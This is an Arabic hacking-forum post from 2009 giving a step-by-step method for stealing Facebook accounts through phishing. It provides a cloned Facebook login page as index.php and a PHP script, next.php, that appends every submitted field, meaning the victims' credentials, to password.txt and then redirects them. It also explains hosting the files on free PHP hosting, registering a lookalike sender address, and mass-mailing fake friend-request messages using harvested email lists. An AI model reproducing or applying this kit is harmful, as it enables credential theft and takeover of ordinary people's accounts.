اليوم أحضرت لكم طريقة خطيرة لسرقة الفيس بوك FaCe BoOkسنعتمد طريقة
PhIsHiNg / SpOoFiNg التي تستعمل في جلب الفيزا وأشياء أخرى أظن أنني أكثرت في الكلام حسنا سوف أبدأ ندخل ألان في صلب الموضوع وشاهدوا معي الطريقة خطوة خطوة أول شئ ادخل على الموقع الرسمي للفيس بوك ثم صفحة الدخول أو مباشرة من هنا http://www.facebook.com/login.php و ادخل على السورس
واعمل نسخ للكل ولصق في أي محرر نصوص ثم اعمل كما في الصورة
بعدها قم بحفظ الملف على شكل index.php وليس index.html أو انسخ هذا الكود
كود PHP:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook"> <head> <title>Login | Facebook</title> <meta http-equiv="*******-type" *******="text/html; charset=utf-8" /> <meta http-equiv="*******-language" *******="en" /> <meta http-equiv="X-UA-Compatible" *******="IE=EmulateIE7" /> <script type="text/javascript"> //<![CDATA[ (function(href) { var uri_re = /^(?:(?:[^:\/?#]+):)?(?:\/\/(?:[^\/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?/; href.replace(uri_re, function(all, path, query, frag) { if (frag) { var dst, src = path + (query ? '?' + query : ''); if (frag.charAt(0) == '/') { dst = frag.replace(/^\/+/, '/'); } else if (/&|=/.test(frag)) { var q = {}; var m = frag.match(/([^#]*)(#.*)?/); var arr = (query||'').split('&').concat((m[1]||'').split('&')); for (var i=0, length=arr.length; i<length; i++) { var t = arr[i].split('='); if (t.length && t[0] != '') { q[t[0]] = t[1]; } } var s = []; for (var i in q) { s.push(i+ (q[i]?'='+q[i]:'')); } dst = path+'?'+s.join('&')+(m[2]||''); } if (dst && dst != src) { window.location.replace(dst); } } }); })(window.location.href);Env={method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:141813,static_base:"http:\/\/static.ak.fbcdn.net\/",ecdc_page_regex:"^\\\/(safe_image\\.php|ajax\\\/perf\\.php|profile\\.php|home\\.php|photo\\.php|album\\.php|photo_search\\.php|photos\\.php|wall\\.php|friends\\\/ajax\\\/filters\\.php|friends\\\/ajax\\\/friends\\.php|friends\\\/ajax\\\/selector\\.php|group\\.php|groups\\.php|friends\\\/$)",ecdc_always_page_regex:"^\\\/ajax\\\/(chat\\\/buddy_list\\.php|presence\\\/update\\.php|typeahead_log\\.php|scribe_log\\.php|f\\.php)",tlds:["com"]}; var onloadRegister = window.onloadRegister || function(h) { onloadhooks.push(h); }; var onloadhooks = window.onloadhooks || []; var onafterloadRegister = window.onafterloadRegister || function(h) { onafterloadhooks.push(h); }; var onafterloadhooks = window.onafterloadhooks || []; function wait_for_load(element, e, f) { f = bind(element, f, e); if (window.loaded) { return f(); } switch ((e || event).type) { case 'load': onloadRegister(f); return; case 'click': if (element.original_cursor === undefined) { element.original_cursor = element.style.cursor; } if (********.body.original_cursor === undefined) { ********.body.original_cursor = ********.body.style.cursor; } element.style.cursor = ********.body.style.cursor = 'progress'; onafterloadRegister(function() { element.style.cursor = element.original_cursor; ********.body.style.cursor = ********.body.original_cursor; element.original_cursor = ********.body.original_cursor = undefined; if (element.tagName.toLowerCase() == 'a') { var original_event = window.event; window.event = e; var ret_value = element.onclick.call(element, e); window.event = original_event; if (ret_value !== false && element.href) { window.location.href = element.href; } } else if (element.click) { element.click(); } }); break; } return false; }; function bind(obj, method ) { var args = []; for (var ii = 2; ii < arguments.length; ii++) { args.push(arguments[ii]); } var fn = function() { var _obj = obj || (this == window ? false : this); var _args = args.slice(); for (var jj = 0; jj < arguments.length; jj++) { _args.push(arguments[jj]); } if (typeof(method) == "string") { if (_obj[method]) { return _obj[method].apply(_obj, _args); } } else { return method.apply(_obj, _args); } }; if (typeof method == 'string') { fn.name = method; } else if (method && method.name) { fn.name = method.name; } fn.toString = function() { return bind._toString(obj, args, method); }; return fn; }; bind._toString = bind._toString || function(obj, args, method) { return (typeof method == 'string') ? ('late bind<'+method+'>') : ('bound<'+method.toString()+'>'); }; function goURI(uri) { uri = uri.toString(); if (window.PageTransitions && PageTransitions.isInitialized()) { PageTransitions.go(uri); } else if (window.location.href == uri) { window.location.reload(); } else { window.location.href = uri; } } var PrimordialBootloader = window.PrimordialBootloader || { loaded : [], done : function(names) { PrimordialBootloader.loaded.push(names); } }; var Bootloader = window.Bootloader || { done : PrimordialBootloader.done };********.****** = "cavalry_transit_start_time=; expires=Mon, 26 Jul 1997 05:00:00 GMT; path=\/; domain=.facebook.com"; //]]> </script> <meta name="robots" *******="noodp,noydir" /> <meta name="description" *******="Facebook is a social utility that connects people with friends and others who work, study and live around them. People use Facebook to keep up with friends, upload an unlimited number of photos, share links and videos, and learn more about the people they meet." /> <script type="text/javascript" src="http://b.static.ak.fbcdn.net/js_strings.php/t85629/en_US"></script>
window.onload = function() { ********.****** = "test_******=1;domain=.facebook.com"; var e = ge('email'), p = ge('pass');
// We sometimes show you *only* a password prompt, so focus that if there // is no e-mail prompt.
if (e && !e.value) { e.focus(); } else if (p) { p.focus(); } };
function formchange() { (ge('persistent')||{}).checked = 0; }
function pop(url) { window.open(url); } </script></body> </html>
ألان لدينا صفحة التسجيل لحد ألان كل شيء تمام الآن يجب علينا صنع صفحة أخرى وهي التي قمنا بتسميتها next.php ولصنعها افتح مرة أخرى محرر النصوص والصق هذا الكود وأحفظ الصفحة تحت اسم next.php
كود PHP:
<?php // FiSh ThE FaCe BoOk // By DeAtH DeV!L <I HaTe Go To ScHoOl> header ('Location: login.html'); $handle = fopen("password.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, ": "); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "---------------------------------\r\n"); fclose($handle); exit; ?>
?>?>ثم قم بعمل ملف نصي سميه "password.txt" لتصلك الباسوردات عليه ملاحظة:الملف النصي يجب أن يكون بنفس مجلد next.php
لكن بقيت خطوة واحدة وهي رفع ملفاتك أي index.php و next.phpو password.txt على أي استضافة مجانية تدعم php
نأتي ألان للعمل الجدي وهي عملية spoof emails والأدوات التي سنحتاجها هي خد ورقة وقلم وسجل أول شئ لازم تسجل بيميل يبعد الشكوك ويكون مشابه جدا للايميل الأصلي للشركة مثل+facebook@w.cnالرسالة الأصلية التي تقول : لقد تلقيت دعوة صداقة من .... للموافقة اضغط على… ندخل ألان على صندوقنا الخاص بإرسال الرسائل ونعمل كما في الصورة
ثم قم بإرسال شبكتك للايميلات اللي عندك و يستحسن استخدام برنامج جلب الايميلات لتكون العملية ناجحة بنسبة مرضية وهذه النتيجة بعد تجربتها
كان هذا موضوعنا لليوم في انتظار مواضيع شيقة أخرى مع DeAtH DeV!L ومبروك الباسوردات مسبقا
شكرا لــJetli007 لتعليمي هذه الطريقة
هذا أول موضوع لي في المنتدى و هو إهداء لـــ
H.T.T.P
Hacker Tunisien Team & Protection
وخصوصا لــPASSWORD
** الرجاء من عاشقي CoPy & PaSt ذكر الاسم عند النقل **
**الصور في المرفقات**
02-05-2009, 01:51 PM
كيفية سرقة حسابات ال face book 
العرض العادي
المواضيع المتشابهه 
